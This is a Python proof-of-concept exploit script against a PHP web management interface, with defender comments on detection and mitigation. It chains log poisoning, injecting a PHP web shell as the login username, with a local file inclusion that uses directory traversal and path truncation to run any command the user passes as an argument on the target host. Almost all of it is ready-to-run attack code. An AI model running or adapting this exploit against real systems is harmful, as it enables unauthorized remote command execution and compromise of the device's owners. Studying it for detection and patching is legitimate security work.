#!/usr/bin/env python3
import requests
import sys
import urllib3
# Two-request proof of concept against a PHP web UI: a log-poisoning step
# followed by a local file inclusion (LFI) of the poisoned log.
#
# Defender notes, based only on the two requests below:
#   * Detection: POSTs to /login.php5 whose userName carries PHP tags, and
#     POSTs to /action.php5 whose _page value contains "/.." sequences or
#     an abnormally long run of "/" characters.
#   * Mitigation: encode user-controlled fields before writing them to a
#     log, and resolve _page against a fixed allowlist of page names
#     instead of building an include path from request data.

# Both requests use verify=False, so the peer certificate is never checked;
# this call only hides the resulting InsecureRequestWarning.
urllib3.disable_warnings()

# Usage check: host and payload are both required positional arguments.
if len(sys.argv) < 3:
    print("%s <host> <payload>" % sys.argv[0])
    sys.exit(1)

host, payload = sys.argv[1], sys.argv[2]

# Stage 1: submit a login whose userName field is PHP source.
# NOTE(review): per the original comment this ends up in /tmp/messages,
# presumably because the login attempt is logged verbatim -- confirm
# against the target's logging code.
login_url = 'https://%s/login.php5' % host
poison_form = {
    "login_auth": 0,
    "miniHiveUI": 1,
    "authselect": "Name/Password",
    "userName": "<?php system($_POST['cmd']); exit(0);?>",
    "password": "a"
}
requests.post(login_url, data=poison_form, verify=False)

# Stage 2: request the log file through the _page parameter.
# NOTE(review): the original comment calls this "path truncation"; the
# 4041 slashes presumably push whatever suffix the server appends past
# the path-length limit -- confirm against the server-side include logic.
traversal = "a" + "/.." * 8 + "/" * 4041 + "/tmp/messages"
include_form = {
    "_page": traversal,
    "cmd": payload
}
include_url = 'https://%s/action.php5?_action=list&debug=true' % host
reply = requests.post(include_url, data=include_form, verify=False)

# The response body is printed unmodified.
print(reply.text)